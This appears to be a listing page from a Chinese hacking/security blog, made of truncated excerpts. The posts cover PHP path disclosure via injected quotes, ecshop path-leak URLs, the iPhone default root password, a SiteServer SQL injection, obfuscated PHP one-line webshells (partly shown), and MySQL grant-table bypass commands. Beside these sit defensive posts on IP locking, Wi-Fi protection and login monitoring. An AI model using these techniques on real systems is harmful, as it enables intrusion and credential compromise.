PHP爆绝对路径方法总结帖

1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: https://www.webshell.cc/news.php?id=149' 截图:     2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: https://www.webshell.cc/resea...

- 阅读全文 -

ecshop的48个泄露网站路径漏洞

https://www.webshell.cc/shop/api/cron.php https://www.webshell.cc/shop/wap/goods.php https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php https://www.webshell.cc/shop/temp/compiled/pages.lbi.php htt...

- 阅读全文 -

默认口令可能导致 iPhone 用户信息泄露

 iPhone 的root默认口令已经不是秘密,随便GOOGLE一下就可以知道Root和mobile帐号密码就是:alpine 国内绝大多数用户购买了IPHONE后,第一时间就是贴膜,接着就是越狱了吧,越狱是为了能使用更多的应用程序、游戏、娱乐等等功能。 有一些应用程序如果需要使用,前提就要安装一些资源包,可以使用IPHONE里的CYDIA下载安装。 比如用户需要在IPHONE使用命令行,或其他相...

- 阅读全文 -

SiteServer 3.4.4最新SQL注入0day

这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本, 但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版, 看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是: SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布) 下载地址:http://www.siteserver.cn/downlo...

- 阅读全文 -

php最新变异一句话

注释:站长的任务又加重了,好好认识下,以后见了好清除 本来匿名发在土司上,现在应该传出去了,两个是来自国外的 http://h.ackack.net/tiny-php-shell.html http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/ 具体看国外的文章吧 第一种:1.php <?=($_=@$_GET...

- 阅读全文 -

MySQL Root密码另类破解

当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时: 停止mysql服务 将下载的user.MYD user.frm user.MYI替换本地文件, 然后 cd mysql\bin mysqld-nt --skip-grant-tables 重新打开一个cmd mysql -u root select user,password from mysql...

- 阅读全文 -

为你的ip加把锁

现在很多单位都配置了局域网,为了便于进行网络管理,同时为了提高的登录网络的速度,网管人员一般都为局域网中的每台电脑都指定了IP地址。但是在Windows环境下其他用户很容易修改IP地址配置,这样就很容易造成IP地址冲突等故障,不利于网络的正常管理。   因此,最好能为IP地址加上一把“锁”,这样别人就不能轻易更改IP地址了。   在Windows 2000/XP中存在Netcfgx.dll,Net...

- 阅读全文 -

TP-LINK无线路由器防蹭网的方法

本文主要以TP-LINK无线路由器为例为大家讲解一下: 首先,要认识蹭网卡“蹭网卡”是一种Wifi无线局域网网卡,和标准的无线网卡相比,主要有以下特点: 1、发射功率大 中国无委会规定天线增益低于10dBi的2.4GHz无线局域网产品等效全向辐射功率(EIRP)必须小于或等于100mW,欧盟CE认证标准也规定2.4GHz无线局域网产品的等效全向辐射功率(EIRP)要小于或等于100mW,所以标准的...

- 阅读全文 -

浅谈PHP可变变量安全

本来想写篇长点的文档的,后来想想这个东西已经被各路牛人实战得无比纯熟了,所以我就只简单的说一下这个东西。 记得我刚接触PHP安全的时候,问几位大牛怎么入门,他们总是和我说去看PHP手册吧,安全就是基础。 没错,我要说的东西在PHP手册里就有非常详细的说明:.net/manual/zh/language.variables.variable.php">http://php.net/manual...

- 阅读全文 -

自动实时监控Windows2003服务器终端登录

朋友一台Windows服务器被黑了,而且还被人恶意删除了一些数据备份,帮其做了下安全加固,考虑到服务器都是通过Windows 终端服务器来管理的,就想办法对其登录做个监控,找了个命令行下发邮件的小工具blat还有批处理,做了个简单的监控程序,功能是当有人通过终端登录且成功后,会向指定的邮箱发送登录者IP地址。 1.先下载blat解压缩到c盘blat目录下面。 2.任意目录新建一个bat文件,我这里...

- 阅读全文 -